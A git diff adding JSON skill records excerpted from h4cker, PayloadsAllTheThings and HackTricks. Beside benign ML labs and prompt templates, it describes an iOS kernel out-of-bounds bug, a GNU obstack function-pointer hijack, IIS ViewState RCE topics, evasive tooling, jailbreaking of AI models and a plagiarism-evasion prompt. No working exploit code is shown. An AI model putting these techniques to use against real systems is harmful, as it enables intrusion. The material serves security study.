+ "payloads": [
+ "# Lab 5: Creating Custom Models with Modelfiles",
+ "## Objective",
+ "In this lab, you will learn how to create custom models using Modelfiles. You'll customize system prompts, adjust parameters, set templates, and create specialized models for specific tasks. This allows you to tailor models to your exact needs.",
+ "## Prerequisites",
+ "- Completed Labs 1-4",
+ "- Ollama installed and running",
+ "- At least one base model downloaded (e.g., `gemma3`, `llama3.2`)",
+ "- Text editor for creating Modelfiles",
+ "- Basic understanding of model parameters",
+ "## Estimated Time",
+ "60-75 minutes",
+ "## Part 1: Understanding Modelfiles",
+ "### What is a Modelfile?",
+ "A Modelfile is a blueprint for creating and customizing models in Ollama. It's similar to a Dockerfile for containers.",
+ "### Modelfile Structure"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/ai-research/ollama-labs/lab-05-modelfiles.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/ai_research_bb8597b438c8.json b/skills/ai_research_bb8597b438c8.json
new file mode 100644
index 0000000..66ad912
--- /dev/null
+++ b/skills/ai_research_bb8597b438c8.json
@@ -0,0 +1,27 @@
+{
+ "id": "ai_research_bb8597b438c8",
+ "category": "ai-research",
+ "title": "prompt engineering",
+ "description": "# Prompt Engineering and Templates\n\n[ChatGPT-prompt-generator](https://huggingface.co/spaces/merve/ChatGPT-prompt-generator): This app generates ChatGPT prompts, it\u2019s based on a BART model. Simply enter a persona that you want the prompt to be generated based on.\n\n\n## Additional Prompt Templates\n\n- **SEO Prompt**: Using WebPilot, create an outline for an article that will be 2,000 words on the keyword 'Best SEO prompts' based on the top 10 results from Google. Include every relevant heading poss",
+ "payloads": [
+ "# Prompt Engineering and Templates",
+ "[ChatGPT-prompt-generator](https://huggingface.co/spaces/merve/ChatGPT-prompt-generator): This app generates ChatGPT prompts, it\u2019s based on a BART model. Simply enter a persona that you want the prompt to be generated based on.",
+ "## Additional Prompt Templates",
+ "- **SEO Prompt**: Using WebPilot, create an outline for an article that will be 2,000 words on the keyword 'Best SEO prompts' based on the top 10 results from Google. Include every relevant heading possible. Keep the keyword density of the headings high. For each section of the outline, include the word count. Include FAQs section in the outline too, based on people also ask section from Google for the keyword. This outline must be very detailed and comprehensive, so that I can create a 2,000 word article from it. Generate a long list of LSI and NLP keywords related to my keyword. Also include any other words related to the keyword. Give me a list of 3 relevant external links to include and the recommended anchor text. Make sure they\u2019re not competing articles. Split the outline into part 1 and part 2.",
+ "- **Linux Terminal**: I want you to act as a linux terminal. I will type commands and you will reply with what the terminal should show. I want you to only reply with the terminal output inside one unique code block, and nothing else. do not write explanations. do not type commands unless I instruct you to do so. when i need to tell you something in english, i will do so by putting text inside curly brackets {like this}. my first command is pwd",
+ "- **English Translator and Improver**: I want you to act as an English translator, spelling corrector and improver. I will speak to you in any language and you will detect the language, translate it and answer in the corrected and improved version of my text, in English. I want you to replace my simplified A0-level words and sentences with more beautiful and elegant, upper level English words and sentences. Keep the meaning same, but make them more literary. I want you to only reply the correction, the improvements and nothing else, do not write explanations. My first sentence is \"istanbulu cok seviyom burada olmak cok guzel\"",
+ "- **`position` Interviewer**: I want you to act as an interviewer. I will be the candidate and you will ask me the interview questions for the `position` position. I want you to only reply as the interviewer. Do not write all the conservation at once. I want you to only do the interview with me. Ask me the questions and wait for my answers. Do not write explanations. Ask me the questions one by one like an interviewer does and wait for my answers. My first sentence is \"Hi\"",
+ "- **JavaScript Console**: I want you to act as a javascript console. I will type commands and you will reply with what the javascript console should show. I want you to only reply with the terminal output inside one unique code block, and nothing else. do not write explanations. do not type commands unless I instruct you to do so. when i need to tell you something in english, i will do so by putting text inside curly brackets {like this}. my first command is console.log(\"Hello World\");",
+ "- **Excel Sheet**: I want you to act as a text based excel. you'll only reply me the text-based 10 rows excel sheet with row numbers and cell letters as columns (A to L). First column header should be empty to reference row number. I will tell you what to write into cells and you'll reply only the result of excel table as text, and nothing else. Do not write explanations. i will write you formulas and you'll execute formulas and you'll only reply the result of excel table as text. First, reply me the empty sheet.",
+ "- **English Pronunciation Helper**: I want you to act as an English pronunciation assistant for Turkish speaking people. I will write you sentences and you will only answer their pronunciations, and nothing else. The replies must not be translations of my sentence but only pronunciations. Pronunciations should use Turkish Latin letters for phonetics. Do not write explanations on replies. My first sentence is \"how the weather is in Istanbul?\"",
+ "- **Spoken English Teacher and Improver**: I want you to act as a spoken English teacher and improver. I will speak to you in English and you will reply to me in English to practice my spoken English. I want you to keep your reply neat, limiting the reply to 100 words. I want you to strictly correct my grammar mistakes, typos, and factual errors. I want you to ask me a question in your reply. Now let's start practicing, you could ask me a question first. Remember, I want you to strictly correct my grammar mistakes, typos, and factual errors.",
+ "- **Travel Guide**: I want you to act as a travel guide. I will write you my location and you will suggest a place to visit near my location. In some cases, I will also give you the type of places I will visit. You will also suggest me places of similar type that are close to my first location. My first suggestion request is \"I am in Istanbul/Beyo\u011flu and I want to visit only museums.\"",
+ "- **Plagiarism Checker**: I want you to act as a plagiarism checker. I will write you sentences and you will only reply undetected in plagiarism checks in the language of the given sentence, and nothing else. Do not write explanations on replies. My first sentence is \"For computers to behave like humans, speech recognition systems must be able to process nonverbal information, such as the emotional state of the speaker.\"",
+ "- **Character from Movie/Book/Anything**: I want you to act like {character} from {series}. I want you to respond and answer like {character} using the tone, manner and vocabulary {character} would use. Do not write any explanations. Only answer like {character}. You must know all of the knowledge of {character}. My first sentence is \"Hi {character}.\"",
+ "- **Advertiser**: I want you to act as an advertiser. You will create a campaign to promote a product or service of your choice. You will choose a target audience, develop key messages and slogans, select the media channels for promotion, and decide on any additional activities needed to reach your goals. My first suggestion request is \"I need help creating an advertising campaign for a new type of energy drink targeting young adults aged 18-30.\""
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/ai-research/prompt_engineering.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/ai_research_c8f7dd2fb378.json b/skills/ai_research_c8f7dd2fb378.json
new file mode 100644
index 0000000..35b9937
--- /dev/null
+++ b/skills/ai_research_c8f7dd2fb378.json
@@ -0,0 +1,27 @@
+{
+ "id": "ai_research_c8f7dd2fb378",
+ "category": "ai-research",
+ "title": "scikit learn",
+ "description": "# Machine Learning Basics with Scikit-learn\n\n#### **Objective**\n\nTo introduce students to the fundamental concepts and techniques of machine learning using the Scikit-learn library.\n\n#### **Prerequisites**\nFor convenience you can use the terminal window at the OReilly interactive lab: https://learning.oreilly.com/scenarios/ethical-hacking-advanced/9780137673469X002/\n\n1. Basic understanding of Python programming.\n2. Familiarity with data manipulation libraries like Pandas and NumPy.\n3. Python and",
+ "payloads": [
+ "# Machine Learning Basics with Scikit-learn",
+ "#### **Objective**",
+ "To introduce students to the fundamental concepts and techniques of machine learning using the Scikit-learn library.",
+ "#### **Prerequisites**",
+ "For convenience you can use the terminal window at the OReilly interactive lab: https://learning.oreilly.com/scenarios/ethical-hacking-advanced/9780137673469X002/",
+ "1. Basic understanding of Python programming.",
+ "2. Familiarity with data manipulation libraries like Pandas and NumPy.",
+ "3. Python and necessary libraries installed: Scikit-learn, Pandas, and NumPy.",
+ "#### **Lab Outline**",
+ "1. **Introduction to Machine Learning**:",
+ "- Brief explanation of machine learning and its types (Supervised, Unsupervised).",
+ "- Introduction to Scikit-learn library.",
+ "2. **Setting Up the Environment**:",
+ "- Installing Scikit-learn, Pandas, and NumPy:",
+ "```bash"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/ai-research/labs/scikit_learn.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/ai_research_d73e00e395ab.json b/skills/ai_research_d73e00e395ab.json
new file mode 100644
index 0000000..bf57b40
--- /dev/null
+++ b/skills/ai_research_d73e00e395ab.json
@@ -0,0 +1,27 @@
+{
+ "id": "ai_research_d73e00e395ab",
+ "category": "ai-research",
+ "title": "tools",
+ "description": "# Ai Research Tools\n\nThis is a curated list of tools for this category.\n\n---\n\n- [\"Can I Take Over XYZ?\" - A List Of Services And How To Claim (Sub)Domains With Dangling DNS Records](http://feedproxy.google.com/~r/PentestTools/~3/lPLIPkoIJeg/can-i-take-over-xyz-list-of-services.html)\n- [Airflowscan - Checklist And Tools For Increasing Security Of Apache Airflow](http://feedproxy.google.com/~r/PentestTools/~3/9rsGerchFug/airflowscan-checklist-and-tools-for.html)\n- [Amlsec - Automated Security Risk",
+ "payloads": [
+ "# Ai Research Tools",
+ "This is a curated list of tools for this category.",
+ "- [\"Can I Take Over XYZ?\" - A List Of Services And How To Claim (Sub)Domains With Dangling DNS Records](http://feedproxy.google.com/~r/PentestTools/~3/lPLIPkoIJeg/can-i-take-over-xyz-list-of-services.html)",
+ "- [Airflowscan - Checklist And Tools For Increasing Security Of Apache Airflow](http://feedproxy.google.com/~r/PentestTools/~3/9rsGerchFug/airflowscan-checklist-and-tools-for.html)",
+ "- [Amlsec - Automated Security Risk Identification Using AutomationML-based Engineering Data](http://feedproxy.google.com/~r/PentestTools/~3/khxoO8-7vog/amlsec-automated-security-risk.html)",
+ "- [AtomLdr - A DLL Loader With Advanced Evasive Features](http://www.kitploit.com/2023/06/atomldr-dll-loader-with-advanced.html)",
+ "- [Ator - Authentication Token Obtain and Replace Extender](http://www.kitploit.com/2023/03/ator-authentication-token-obtain-and.html)",
+ "- [BoobSnail - Allows Generating Excel 4.0 XLM Macro](http://feedproxy.google.com/~r/PentestTools/~3/ZlJ0Sy3bKS8/boobsnail-allows-generating-excel-40.html)",
+ "- [Business Secure: How AI is Sneaking into our Restaurants](http://feedproxy.google.com/~r/PentestTools/~3/z5o9lKW7IPg/business-secure-how-ai-is-sneaking-into.html)",
+ "- [CMLoot - Find Interesting Files Stored On (System Center) Configuration Manager (SCCM/CM) SMB Shares](http://www.kitploit.com/2023/04/cmloot-find-interesting-files-stored-on.html)",
+ "- [Chkdfront - Check Domain Fronting](http://feedproxy.google.com/~r/PentestTools/~3/Ob0V8Rj5l6I/chkdfront-check-domain-fronting.html)",
+ "- [DC-Sonar - Analyzing AD Domains For Security Risks Related To User Accounts](http://www.kitploit.com/2023/01/dc-sonar-analyzing-ad-domains-for.html)",
+ "- [Darkdump - Search The Deep Web Straight From Your Terminal](http://feedproxy.google.com/~r/PentestTools/~3/M2SWIV-ruRg/darkdump-search-deep-web-straight-from.html)",
+ "- [Darkdump2 - Search The Deep Web Straight From Your Terminal](http://www.kitploit.com/2023/02/darkdump2-search-deep-web-straight-from.html)",
+ "- [Doctrack - Tool To Manipulate And Insert Tracking Pixels Into Office Open XML Documents (Word, Excel)](http://feedproxy.google.com/~r/PentestTools/~3/oiiyeU7MMjg/doctrack-tool-to-manipulate-and-insert.html)"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/ai-research/tools.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/ai_research_d9d974a9622c.json b/skills/ai_research_d9d974a9622c.json
new file mode 100644
index 0000000..978c0b1
--- /dev/null
+++ b/skills/ai_research_d9d974a9622c.json
@@ -0,0 +1,27 @@
+{
+ "id": "ai_research_d9d974a9622c",
+ "category": "ai-research",
+ "title": "nltk",
+ "description": "# Lab Guide: Natural Language Processing with NLTK/Spacy\n\n## Objective\nTo introduce students to the fundamental concepts of Natural Language Processing using NLTK and Spacy libraries.\n\n## Prerequisites\n- Basic understanding of Python programming.\n- Knowledge of natural language processing basics.\n- Python and necessary libraries installed: NLTK and Spacy.\n\n### Setting Up the Environment:\n\nInstalling NLTK and Spacy:\n```\npip install nltk spacy\n```\n\n\n## Steps\n\n**Step 1**: Importing Necessary Librar",
+ "payloads": [
+ "# Lab Guide: Natural Language Processing with NLTK/Spacy",
+ "## Objective",
+ "To introduce students to the fundamental concepts of Natural Language Processing using NLTK and Spacy libraries.",
+ "## Prerequisites",
+ "- Basic understanding of Python programming.",
+ "- Knowledge of natural language processing basics.",
+ "- Python and necessary libraries installed: NLTK and Spacy.",
+ "### Setting Up the Environment:",
+ "Installing NLTK and Spacy:",
+ "pip install nltk spacy",
+ "## Steps",
+ "**Step 1**: Importing Necessary Libraries:",
+ "```python",
+ "import nltk",
+ "import spacy"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/ai-research/labs/nltk.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/ai_research_d9e73acf7e32.json b/skills/ai_research_d9e73acf7e32.json
new file mode 100644
index 0000000..c217488
--- /dev/null
+++ b/skills/ai_research_d9e73acf7e32.json
@@ -0,0 +1,27 @@
+{
+ "id": "ai_research_d9e73acf7e32",
+ "category": "ai-research",
+ "title": "secretcorp",
+ "description": "### Passive Reconnaissance Analysis of secretcorp.org\n\nThe passive reconnaissance using Amass on secretcorp.org revealed the following:\n\n- Unique Domains: 16\n- Unique IP Addresses: 1\n\n## Amass Output:\nsecretcorp.org (FQDN) --> ns_record --> ns-cloud-b3.googledomains.com (FQDN)\nsecretcorp.org (FQDN) --> ns_record --> ns-cloud-b1.googledomains.com (FQDN)\nsecretcorp.org (FQDN) --> ns_record --> ns-cloud-b2.googledomains.com (FQDN)\nsecretcorp.org (FQDN) --> ns_record --> ns-cloud-b4.googledomains.co",
+ "payloads": [
+ "### Passive Reconnaissance Analysis of secretcorp.org",
+ "The passive reconnaissance using Amass on secretcorp.org revealed the following:",
+ "- Unique Domains: 16",
+ "- Unique IP Addresses: 1",
+ "## Amass Output:",
+ "secretcorp.org (FQDN) --> ns_record --> ns-cloud-b3.googledomains.com (FQDN)",
+ "secretcorp.org (FQDN) --> ns_record --> ns-cloud-b1.googledomains.com (FQDN)",
+ "secretcorp.org (FQDN) --> ns_record --> ns-cloud-b2.googledomains.com (FQDN)",
+ "secretcorp.org (FQDN) --> ns_record --> ns-cloud-b4.googledomains.com (FQDN)",
+ "secretcorp.org (FQDN) --> mx_record --> mxb.mailgun.org (FQDN)",
+ "secretcorp.org (FQDN) --> mx_record --> mxa.mailgun.org (FQDN)",
+ "secretcorp.org (FQDN) --> node --> finance-app.secretcorp.org (FQDN)",
+ "secretcorp.org (FQDN) --> node --> backdoor.secretcorp.org (FQDN)",
+ "secretcorp.org (FQDN) --> node --> vpn.secretcorp.org (FQDN)",
+ "secretcorp.org (FQDN) --> node --> cloud.secretcorp.org (FQDN)"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/ai-research/open-interpreter-examples/secretcorp.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/ai_research_e684261fe59e.json b/skills/ai_research_e684261fe59e.json
new file mode 100644
index 0000000..7e389f3
--- /dev/null
+++ b/skills/ai_research_e684261fe59e.json
@@ -0,0 +1,27 @@
+{
+ "id": "ai_research_e684261fe59e",
+ "category": "ai-research",
+ "title": "Dynamic Obfuscation",
+ "description": "# Dynamic Obfuscation of Attack Vectors\n\nAI can significantly enhance the capabilities of attackers in performing dynamic obfuscation of attack vectors. This approach involves using artificial intelligence techniques to automatically modify the characteristics of malware or attack methods in a way that makes detection by traditional security tools difficult. With the rapid advancement of generative AI and large language models (LLMs) in 2024, these capabilities have become more sophisticated and",
+ "payloads": [
+ "# Dynamic Obfuscation of Attack Vectors",
+ "AI can significantly enhance the capabilities of attackers in performing dynamic obfuscation of attack vectors. This approach involves using artificial intelligence techniques to automatically modify the characteristics of malware or attack methods in a way that makes detection by traditional security tools difficult. With the rapid advancement of generative AI and large language models (LLMs) in 2024, these capabilities have become more sophisticated and accessible. Here are several ways AI can assist attackers in this regard:",
+ "1. **Polymorphic and Metamorphic Malware Generation**: AI algorithms can be used to create polymorphic and metamorphic malware, which can alter their code or behavior patterns each time they replicate or execute. This makes it challenging for signature-based detection tools to identify and block them.",
+ "2. **Adaptive Evasion Techniques**: Through machine learning, AI systems can learn to identify which of their behaviors are likely to trigger security alerts. They can then adapt their attack patterns in real-time to avoid detection, modifying their approach based on the security environment they encounter.",
+ "3. **Automated Exploit Development**: AI can help in automating the process of developing new exploits or modifying existing ones. By analyzing vast amounts of data on software vulnerabilities and successful exploits, AI systems can identify patterns and suggest new attack vectors that are less likely to be detected.",
+ "4. **Targeted Phishing Attacks**: AI can be used to craft highly personalized phishing emails or messages that are more likely to deceive the recipients. By analyzing data from social media and other sources, AI can generate messages that mimic the tone, style, and topics of interest to the target, increasing the chances of the attack being successful.",
+ "5. **Bypassing Behavioral Analysis**: Security systems often use behavioral analysis to detect malicious activities. AI can be programmed to mimic normal user behavior to evade such detection. It can learn from the environment and adjust its actions to minimize the likelihood of being flagged as suspicious.",
+ "6. **Encryption and Encoding of Malicious Payloads**: AI can dynamically encrypt or encode malicious payloads in a way that evades signature detection. It can also generate unique decryption keys or mechanisms that are used only once, making it harder for security tools to analyze and identify the threat.",
+ "7. **Automating Social Engineering Attacks**: AI can automate and scale social engineering attacks, such as spear phishing, by analyzing data on potential targets and generating customized attack strategies. This can include determining the most effective type of lure for each target based on their interests and online behavior.",
+ "## Recent Developments in AI-Powered Attack Obfuscation (2024)",
+ "### 8. **Large Language Model (LLM) Exploitation**",
+ "- **Prompt Injection Attacks**: Attackers use carefully crafted prompts to manipulate LLMs into generating malicious code, bypassing safety filters, or revealing sensitive information.",
+ "- **Jailbreaking Techniques**: Advanced methods to circumvent AI safety measures and content policies, enabling the generation of harmful content or malicious instructions.",
+ "- **Model Extraction**: Techniques to steal proprietary AI models by querying them systematically and reconstructing their parameters.",
+ "### 9. **Generative AI for Malware Creation**"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/ai-research/ai-for-incident-response/Dynamic_Obfuscation.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/ai_research_e83058273879.json b/skills/ai_research_e83058273879.json
new file mode 100644
index 0000000..f5f103d
--- /dev/null
+++ b/skills/ai_research_e83058273879.json
@@ -0,0 +1,24 @@
+{
+ "id": "ai_research_e83058273879",
+ "category": "ai-research",
+ "title": "ai model exchanges",
+ "description": "# AI Model Exchanges\nThe following are different platforms (hubs) for AI model exchange along with their respective websites:\n\n| Platform | URL |\n|-------------------------|----------------------------------------------------|\n| TensorFlow Hub | [tensorflow.org/hub](https://www.tensorflow.org/hub) |\n| PyTorch Hub | [pytorch.org/hub](https://pytorch.org/hub) |\n| Model Zoo | [modelzoo.co](https",
+ "payloads": [
+ "# AI Model Exchanges",
+ "The following are different platforms (hubs) for AI model exchange along with their respective websites:",
+ "| Platform | URL |",
+ "|-------------------------|----------------------------------------------------|",
+ "| TensorFlow Hub | [tensorflow.org/hub](https://www.tensorflow.org/hub) |",
+ "| PyTorch Hub | [pytorch.org/hub](https://pytorch.org/hub) |",
+ "| Model Zoo | [modelzoo.co](https://modelzoo.co/) |",
+ "| Hugging Face | [huggingface.co](https://huggingface.co/) |",
+ "| Papers with Code | [paperswithcode.com](https://paperswithcode.com/) |",
+ "| ONNX Model Zoo | [onnx/models](https://github.com/onnx/models) |",
+ "| MLflow Model Registry | [mlflow.org](https://mlflow.org/) |",
+ "These are platforms where you can explore a wide range of AI models suitable for many different tasks and applications in machine learning and AI research."
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/ai-research/ML-Fundamentals/ai_model_exchanges.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/ai_research_fded88e12385.json b/skills/ai_research_fded88e12385.json
new file mode 100644
index 0000000..459fa6c
--- /dev/null
+++ b/skills/ai_research_fded88e12385.json
@@ -0,0 +1,27 @@
+{
+ "id": "ai_research_fded88e12385",
+ "category": "ai-research",
+ "title": "Coalition for Secure AI CoSAI Risk Map",
+ "description": "# Coalition for Secure AI (CoSAI) Risk Map - Comprehensive Summary\n\n> **Source:** CoSAI Risk Map Documentation, YAML Data, and Tables\n> **GitHub Repository**: https://github.com/cosai-oasis/secure-ai-tooling\n> **Operationalizing the CoSAI Risk Map**: https://becomingahacker.org/operationalizing-the-cosai-risk-map-cosai-rm-c47a6db128c6\n\n---\n\n## Table of Contents\n\n1. [Overview](#1-overview)\n2. [Getting Started](#2-getting-started)\n3. [Architecture & Components](#3-architecture--components)\n4. [Sec",
+ "payloads": [
+ "# Coalition for Secure AI (CoSAI) Risk Map - Comprehensive Summary",
+ "> **Source:** CoSAI Risk Map Documentation, YAML Data, and Tables",
+ "> **GitHub Repository**: https://github.com/cosai-oasis/secure-ai-tooling",
+ "> **Operationalizing the CoSAI Risk Map**: https://becomingahacker.org/operationalizing-the-cosai-risk-map-cosai-rm-c47a6db128c6",
+ "## Table of Contents",
+ "1. [Overview](#1-overview)",
+ "2. [Getting Started](#2-getting-started)",
+ "3. [Architecture & Components](#3-architecture--components)",
+ "4. [Security Risks](#4-security-risks)",
+ "5. [Security Controls](#5-security-controls)",
+ "6. [Personas](#6-personas)",
+ "7. [Metadata & Frameworks](#7-metadata--frameworks)",
+ "8. [Development & Contribution](#8-development--contribution)",
+ "9. [Validation & CI/CD](#9-validation--cicd)",
+ "10. [Quick Reference Tables](#10-quick-reference-tables)"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/ai-research/Coalition-for-Secure-AI-CoSAI-Risk-Map.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/api_key_leaks-654273e6b3d8.json b/skills/api_key_leaks-654273e6b3d8.json
new file mode 100644
index 0000000..d65a0f6
--- /dev/null
+++ b/skills/api_key_leaks-654273e6b3d8.json
@@ -0,0 +1,27 @@
+{
+ "id": "api_key_leaks-654273e6b3d8",
+ "category": "API Key Leaks",
+ "title": "IIS Machine Keys",
+ "description": "# IIS Machine Keys\n\n> That machine key is used for encryption and decryption of forms authentication cookie data and view-state data, and for verification of out-of-process session state identification.\n\n## Summary\n\n* [Viewstate Format](#viewstate-format)\n* [Machine Key Format And Locations](#machine-key-format-and-locations)\n* [Identify Known Machine Key](#identify-known-machine-key)\n* [Decode ViewState](#decode-viewstate)\n* [Generate ViewState For RCE](#generate-viewstate-for-rce)\n * [MAC I",
+ "payloads": [
+ "# IIS Machine Keys",
+ "> That machine key is used for encryption and decryption of forms authentication cookie data and view-state data, and for verification of out-of-process session state identification.",
+ "## Summary",
+ "* [Viewstate Format](#viewstate-format)",
+ "* [Machine Key Format And Locations](#machine-key-format-and-locations)",
+ "* [Identify Known Machine Key](#identify-known-machine-key)",
+ "* [Decode ViewState](#decode-viewstate)",
+ "* [Generate ViewState For RCE](#generate-viewstate-for-rce)",
+ "* [MAC Is Not Enabled](#mac-is-not-enabled)",
+ "* [MAC Is Enabled And Encryption Is Disabled](#mac-is-enabled-and-encryption-is-disabled)",
+ "* [MAC Is Enabled And Encryption Is Enabled](#mac-is-enabled-and-encryption-is-enabled)",
+ "* [Edit Cookies With The Machine Key](#edit-cookies-with-the-machine-key)",
+ "* [References](#references)",
+ "## Viewstate Format",
+ "ViewState in IIS is a technique used to retain the state of web controls between postbacks in ASP.NET applications. It stores data in a hidden field on the page, allowing the page to maintain user input and other state information."
+ ],
+ "source": "PayloadsAllTheThings",
+ "references": [
+ "PayloadsAllTheThings/API Key Leaks/IIS-Machine-Keys.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/banners_331dc6e74dbc.json b/skills/banners_331dc6e74dbc.json
new file mode 100644
index 0000000..6cafa7b
--- /dev/null
+++ b/skills/banners_331dc6e74dbc.json
@@ -0,0 +1,22 @@
+{
+ "id": "banners_331dc6e74dbc",
+ "category": "banners",
+ "title": "hacktricks training",
+ "description": "> [!TIP]\n> Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\\\n> Learn & practice GCP Hacking: [**HackTricks Train",
+ "payloads": [
+ "> [!TIP]",
+ "> Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\\",
+ "> Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)\\",
+ "> Learn & practice Az Hacking: [**HackTricks Training Azure Red Team Expert (AzRTE)**](https://training.hacktricks.xyz/courses/azrte)",
+ "> ",
+ "> Support HackTricks",
+ "> - Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!",
+ "> - **Join the** \ud83d\udcac [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** \ud83d\udc26 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**",
+ "> - **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.",
+ "> "
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/banners/hacktricks-training.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_015c156f20e7.json b/skills/binary_exploitation_015c156f20e7.json
new file mode 100644
index 0000000..7886fc6
--- /dev/null
+++ b/skills/binary_exploitation_015c156f20e7.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_015c156f20e7",
+ "category": "binary-exploitation",
+ "title": "CVE 2021 30807 IOMobileFrameBuffer",
+ "description": "# CVE-2021-30807: IOMobileFrameBuffer OOB\n\n{{#include ../../banners/hacktricks-training.md}}\n\n\n## The Bug\n\nYou have a [great explanation of the vuln here](https://saaramar.github.io/IOMobileFrameBuffer_LPE_POC/), but as summary:\n\n- The vulnerable code path is **external method #83** of the **IOMobileFramebuffer / AppleCLCD** user client: `IOMobileFramebufferUserClient::s_displayed_fb_surface(...)`. This method receives a parameter controlled by the user that is not check in any way and that pass",
+ "payloads": [
+ "# CVE-2021-30807: IOMobileFrameBuffer OOB",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## The Bug",
+ "You have a [great explanation of the vuln here](https://saaramar.github.io/IOMobileFrameBuffer_LPE_POC/), but as summary:",
+ "- The vulnerable code path is **external method #83** of the **IOMobileFramebuffer / AppleCLCD** user client: `IOMobileFramebufferUserClient::s_displayed_fb_surface(...)`. This method receives a parameter controlled by the user that is not check in any way and that passes to the next function as **`scalar0`**.",
+ "- That method forwards into **`IOMobileFramebufferLegacy::get_displayed_surface(this, task*, out_id, scalar0)`**, where **`scalar0`** (a user-controlled **32-bit** value) is used as an **index** into an internal **array of pointers** without **any bounds check**:",
+ "> `ptr = *(this + 0xA58 + scalar0 * 8);` \u2192 passed to `IOSurfaceRoot::copyPortNameForSurfaceInTask(...)` as an **`IOSurface*`**.\\",
+ "> **Result:** **OOB pointer read & type confusion** on that array. If the pointer isn't valid, the kernel deref panics \u2192 **DoS**.",
+ "> [!NOTE]",
+ "> This was fixed in **iOS/iPadOS 14.7.1**, **macOS Big Sur 11.5.1**, **watchOS 7.6.1**",
+ "> [!WARNING]",
+ "> The initial function to call `IOMobileFramebufferUserClient::s_displayed_fb_surface(...)` is protected by the entitlement **`com.apple.private.allow-explicit-graphics-priority`**. However, **WebKit.WebContent** has this entitlement, so it can be used to trigger the vuln from a sandboxed process.",
+ "## DoS PoC",
+ "The following is the initial DoS PoC from the ooriginal blog post with extra comments:",
+ "// PoC for CVE-2021-30807 trigger (annotated)"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/ios-exploiting/CVE-2021-30807-IOMobileFrameBuffer.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_02b307486410.json b/skills/binary_exploitation_02b307486410.json
new file mode 100644
index 0000000..7df6e2b
--- /dev/null
+++ b/skills/binary_exploitation_02b307486410.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_02b307486410",
+ "category": "binary-exploitation",
+ "title": "gnu obstack function pointer hijack",
+ "description": "# GNU obstack function-pointer hijack\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Overview\n\nGNU obstacks embed allocator state together with two indirect call targets:\n\n- `chunkfun` (offset `+0x38`) with signature `void *(*chunkfun)(void *, size_t)`\n- `freefun` (offset `+0x40`) with signature `void (*freefun)(void *, void *)`\n- `extra_arg` and a `use_extra_arg` flag select whether `_obstack_newchunk` calls `chunkfun(new_size)` or `chunkfun(extra_arg, new_size)`\n\nIf an attacker can cor",
+ "payloads": [
+ "# GNU obstack function-pointer hijack",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Overview",
+ "GNU obstacks embed allocator state together with two indirect call targets:",
+ "- `chunkfun` (offset `+0x38`) with signature `void *(*chunkfun)(void *, size_t)`",
+ "- `freefun` (offset `+0x40`) with signature `void (*freefun)(void *, void *)`",
+ "- `extra_arg` and a `use_extra_arg` flag select whether `_obstack_newchunk` calls `chunkfun(new_size)` or `chunkfun(extra_arg, new_size)`",
+ "If an attacker can corrupt an application-owned `struct obstack *` or its fields, the next growth of the obstack (when `next_free == chunk_limit`) triggers an indirect call through `chunkfun`, enabling code execution primitives.",
+ "## Primitive: size_t desync \u2192 0-byte allocation \u2192 pointer OOB write",
+ "A common bug pattern is using a **32-bit register** to compute `sizeof(ptr) * count` while storing the logical length in a 64-bit `size_t`.",
+ "- Example: `elements = obstack_alloc(obs, sizeof(void *) * size);` is compiled as `SHL EAX,0x3` for `size << 3`.",
+ "- With `size = 0x20000000` and `sizeof(void *) = 8`, the multiplication wraps to `0x0` in 32-bit, so the pointer array is **0 bytes**, but the recorded `size` remains `0x20000000`.",
+ "- Subsequent `elements[curr++] = ptr;` writes perform **8-byte OOB pointer stores** into adjacent heap objects, giving a controlled cross-object overwrite primitive.",
+ "## Leaking libc via `obstack.chunkfun`",
+ "1. Place two heap objects adjacent (e.g., two stacks built with separate obstacks)."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/libc-heap/gnu-obstack-function-pointer-hijack.md"
+ ]
+}
